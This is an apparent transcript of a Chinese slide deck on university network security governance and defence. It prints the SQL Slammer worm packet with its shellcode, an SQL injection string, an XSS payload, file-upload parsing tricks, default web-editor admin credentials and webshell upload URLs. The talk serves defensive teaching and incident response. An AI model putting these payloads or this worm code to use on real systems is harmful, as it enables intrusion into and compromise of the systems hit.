网络安全治理与技术防范 - EventDove · 高校系统及网站安全现状...
58
Transcript of 网络安全治理与技术防范 - EventDove · 高校系统及网站安全现状...
2
0000: 4500 0194 b6db 0000 6d11 2e2d 89e5 0a9c E...¶Û..m..-.å..
0010: cb08 07c7 1052 059a 0180 bda8 0401 0101 Ë..Ç.R....½¨....
0020: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0030: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0040: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0050: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0060: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0070: 0101 0101 0101 0101 0101 0101 01dc c9b0 .............ÜÉ°0080: 42eb 0e01 0101 0101 0101 70ae 4201 70ae Bë........p®B.p®
0090: 4290 9090 9090 9090 9068 dcc9 b042 b801 B........hÜÉ°B¸.
00a0: 0101 0131 c9b1 1850 e2fd 3501 0101 0550 ...1ɱ.Pâý5....P
00b0: 89e5 5168 2e64 6c6c 6865 6c33 3268 6b65 .åQh.dllhel32hke
00c0: 726e 5168 6f75 6e74 6869 636b 4368 4765 rnQhounthickChGe
00d0: 7454 66b9 6c6c 5168 3332 2e64 6877 7332 tTf¹llQh32.dhws2
00e0: 5f66 b965 7451 6873 6f63 6b66 b974 6f51 _f¹etQhsockf¹toQ
00f0: 6873 656e 64be 1810 ae42 8d45 d450 ff16 hsend¾..®B.EÔP..
0100: 508d 45e0 508d 45f0 50ff 1650 be10 10ae P.EàP.EðP..P¾..®
0110: 428b 1e8b 033d 558b ec51 7405 be1c 10ae B....=U.ìQt.¾..®
0120: 42ff 16ff d031 c951 5150 81f1 0301 049b B...Ð1ÉQQP.ñ....
0130: 81f1 0101 0101 518d 45cc 508b 45c0 50ff .ñ....Q.EÌP.EÀP.
0140: 166a 116a 026a 02ff d050 8d45 c450 8b45 .j.j.j..ÐP.EÄP.E
0150: c050 ff16 89c6 09db 81f3 3c61 d9ff 8b45 ÀP...Æ.Û..óa...E
0160: b48d 0c40 8d14 88c1 e204 01c2 c1e2 0829 ´..@...Áâ..ÂÁâ.)0170: c28d 0490 01d8 8945 b46a 108d 45b0 5031 Â....Ø.E´j..E°P1
0180: c951 6681 f178 0151 8d45 0350 8b45 ac50 ÉQf.ñx.Q.E.P.E¬P
0190: ffd6 ebca .ÖëÊ
SQL Slammer Worm UDP packet
3
4
EGBL = EGREGIOUS BLUNDER (Fortigate Firewall + HTTPD exploit )ELBA = ELIGIBLE BACHELOR (topsec firewall )ELBO = ELIGIBLE BOMBSHELL (Chinese TOPSEC firewall)ELCA = ELIGIBLE CANDIDATE (topsec firewall )ELCO = ELIGIBLE CONTESTANT (topsec firewall )EPBA = EPIC BANANA (cisco asa与juniper )ESPL = ESCALATE PLOWMAN EXBA = EXTRA BACON (Cisco ASA v8.0 to v8.4)
BANANAGLEE Juniper CISCO BARGLEE BANANAGLEE firewallBLATSTING scan,profiler,sniffer类似于BG里的LPBUZZDIRECTIONEXPLOITS EXPOPS This folder contain the script is used to configure Apache on your Opbox for FW OpsSCRIPTS TOOLS TURBO HUAWEI
Shotgaint
维基解密:CIA
高校系统及网站安全现状
• 1、大多数应用服务为B/S架构
• 2、高校的开放性造成缺乏有效的安全管理
• 3、用户IP可外网访问
• 4、开发成本非常低(学生、不良公司)
• 5、年久失修(学生离校,公司无能力维护)
• 6、缺乏专业技术人员
• 7、缺乏必要的安全技术防护措施
• 网站及系统容易被攻击。
Know your enemies• 国家、情报机构、团体级别攻击( APT )国家层级的对抗
• 某xxx黑客(政治目的)
• 黑产(水坑、钓鱼、botnet、DDoS、倒卖个人信息等,挖矿、博彩,六合彩,色情,文凭,气狗/电狗………)
• 个别人员(兴趣、炫耀、爱好)甚至走向犯罪
• 内部人员,精力过剩的学生
弱密码• 安全产品对此类行为基本无效
• 拖库
• 撞库
弱密码
SQL注入
• 漏洞介绍
由于程序中对用户输入检查不严格,用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。
• 原因分析
其本质是由于对输入检查不充分,导致SQL语句将用户提交的非法数据当作语句的一部分来执行。
高校大部分的sql注入是高权限 dba权限
admin
' or '1'='1
SQL注入
XSS
• 漏洞介绍恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时嵌
入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。• XSS本质是在于执行脚本[javascript/html等]攻击者的js能力越强攻击效果越惊人!
• 通过XSS执行的javascript,可以做到…• 窃取你正在浏览的cookies信息• 篡改你正在浏览的页面,注入误导信息• 捕获你的所有操作,并发送给黑客• 从定向到黑客的钓鱼站点• 利用浏览器的漏洞控制你的机器• …
XSS• http://XXX.XXX.XXX.XXX/XXXmail/XT3/main/intervalCheck.jsp?sid=111111111111111111</script
><script>alert(123)</script>
上传漏洞
• 文件解析漏洞• IIS 6.0解析漏洞
• 目录解析/test.asp/test.jpg• 文件解析/test.asp;1.jpg• IIS6.0 默认的可执行文件除了asp还包含这三种/test.asa,/test.cer,/test.cdx
• Apache解析漏洞• Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断。• /test.php.xxx• /test.php.rar
• Nginx解析漏洞• 影响版本:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37• /test.jpg/1.php• /test.jpg%00.php
上传漏洞
• 常见编辑器漏洞• eWebEditor编辑器获取webshell
• 默认后台:http://www.test.com/ewebeditor/admin_login.asphttp://www.test.com/ewebeditor/eWebEditor.asp
• 默认口令:admin/adminamdin/admin888
• 默认数据库地址:http://www.test.com/ewebeditor/db/ewebeditor.mdb
上传漏洞
• FCKeditor编辑器获取webshell• http://www.xxx.com/FCKeditor/editor/filemanager/connectors/test.html#• http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?C
onnector=http://www.xxx.com/fckeditor/editor/filemanager/connectors/asp/connector.asp
• http://www.xxx.com/FCKeditor/editor/filemanager/connectors/test.html#• http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?C
onnector=http://www.xxx.com/fckeditor/editor/filemanager/connectors/php/connector.php
• http://www.xxx.com/FCKeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=%2F
• http://www.xxx.com/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/jsp/connector
• XXXX科技管理系统
• 图片传小马
第三方平台漏洞
• Struts2
• HeartBleed
• Java Unserialize
Struts2
XX移动图书馆、XX财务系统、XX站群、XXgps管理、XX教务系统、XXOA等系统某些组织的大杀器----涂改首页
Hearbleed
• Vmware EXSI 5.5• Vmware EXSI 5.5U1---》Vmware EXSI 5.5 U2
• 某监控系统的DVR系统
FF 01 ................0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 77 73 20 4E ....#.......ws N00e0: 54 20 31 30 2E 30 3B 20 57 69 6E 36 34 3B 20 78 T 10.0; Win64; x00f0: 36 34 29 20 41 70 70 6C 65 57 65 62 4B 69 74 2F 64) AppleWebKit/0100: 35 33 37 2E 33 36 20 28 4B 48 54 4D 4C 2C 20 6C 537.36 (KHTML, l0110: 69 6B 65 20 47 65 63 6B 6F 29 20 43 68 72 6F 6D ike Gecko) Chrom0120: 65 2F 35 35 2E 30 2E 32 38 38 33 2E 38 37 20 53 e/55.0.2883.87 S0130: 61 66 61 72 69 2F 35 33 37 2E 33 36 0D 0A 41 75 afari/537.36..Au0140: 74 68 6F 72 69 7A 61 74 69 6F 6E 3A 20 42 61 73 thorization: Bas0150: 69 63 20 59 57 52 74 61 57 34 36 4D 54 49 7A 4E ic YWRtaW46MTIzN0160: 44 55 32 0D 0A 52 65 66 65 72 65 72 3A 20 68 74 DU2..Referer: ht0170: 74 70
Java Unserialize
Webshell
• 查杀比较麻烦• 排查日志• 扫描webshell的python脚本,D盾• rkhunter、chkrootkit查找系统后门排查端口
Webshell
Webshell
我们要增加攻击的成本
技术防范初探PDCA Cycle
信息资产的确定与保护
• 重要服务器
• 托管服务器
• 二级网站
• 楼宇服务器
• 重要的计算机
• 普通计算机
• 明确管理责任
检测(上线准入)
• 系统准入制度• 未经安全评测合格一律不许上线
• 包括漏洞扫描、手工渗透等
• 采用自行开发的工具,漏扫,Burp Suite,Metasploit,Sqlmap等
• 通过授权用户,越权,提权
• 2013年至今对于我校所有的新上线系统及进行评测
黑盒测试
检测(安全巡查)• 漏洞发现与修补,人工挖掘,漏洞紧急修复
• 发现大量的严重的系统漏洞:XXmail,XX财务软件,XX监控等
• 对危险主机、高危网站、脆弱账号集中通报,责令限期整改,先断网后整改,修改方可重新开放开放。
紧急响应机制
• 威胁情报共享• Cncert,国家信息安全评测中心,安全厂家
• CNVD、CNNVD、补天、漏洞盒子src.edu-info.edu.cn
• src.edu-info.edu.cn是教育系统自己的漏洞平台• ipdbsrc
紧急响应机制
• 高效的漏洞通报(根据资产确认漏洞)
• HITCERT• 2001年成立网络安全紧急响应小组(codered)• 关注黑客攻击、病毒感染及蠕虫传播等大规模网络安全事件;• 2017年6月暗云三• 2017年8月魔鼬
S2-045紧急响应时间节点
• 3.7日早威胁情报获取此漏洞,通知信息部门同事
• 3.7日上午分析poc代码
• 校内struts2 系统与网站• XX站群(3.8日升级)• 某财务• 某gps,202.xxx.xxx.10
• xlxp.hit.edu.cn xxx实验室• xxc.hit.edu.cn xxx重点项目• 219.xxx.xxx.8 xxx管理系统• xxx移动图书馆(一直延续到7月中旬)• 僵尸网站
• 202.xxx.xxx.39
• 202.xxx.xxx.44
紧急响应时间节点
• 3.7日中午构建漏扫代码,waf防护代码• 厂商提供固件升级,waf线速不能升级• 编写防护规则,进行测试,避免误拦• 3.7日下午4点上线waf规则• 升级漏扫,大规模扫描
• 3.7日下午5点today发文
紧急响应时间节点
• 3.7日大规模扫描(校内地址)
• 3.7日后校外攻击情况
• Wannacry
• 暗云三、魔鼬
安全防护• 核心设备与数据中心
• Web防护系统
安全防护• 云平台安全防护(纵深防御)
• 重要系统及各部门、院系托管主机采用虚拟化技术构建私有云平台。
• 私有云平台的安全,部署了防护系统,保证虚拟机的安全。• 心脏滴血 2017年4月11日防护
安全防护
• 有效的溯源能力• 32亿-40亿条每日• 60天 1700-2200亿条• Hadoop&spark
• Sensor• 分流器万兆协议还原• 应用识别网络流量• 异常检测• 比如暗云
URL挖掘
• CC
• 安全攻击行为发现
• 非网内域名
• 合规
• 审计
• 服务质量………
• Milestone
• 黑url库
Session信息,DNS信息 NAT信息,日志
• 海量数据:存、查都是难题
• IP地址落地
• 进一步进行分析• 最基础的数据• 溯源• DNS挖掘:基于关键信息挖掘、基于同IP挖掘、基于名称挖掘• 关联:安全设备、服务日志(和前两项比就是几何级降低)• 分析的能力很关键
• 阻断:• BGP黑洞(无日志)• RST:补包处理能力
提高• 加强安全管理(安全制度,安全策略,安全管理、安全技术)• 安全管理人员• 安全应当在系统设计时介入,分区、隔离,源代码审计• 统一的管控:关闭楼宇对外服务ip,统一的安全防护,准入• 资产清晰,必要的安全产品与加固(waf,scanner,主机防护云),安全保护能力、异常发现能力
• 系统加固与升级• 日志与审计有效地溯源能力• 网络安全需要联合防护
• 安全厂商、互联网企业、网络设备厂商、政府、高校
• 加强安全培训特别是对接入用户的培训• 恰当的时刻,恰当的手段
• What is the most important network security spend: Sensor appliances? SIEM? Threat intelligence feeds?
• It's your analyst team.
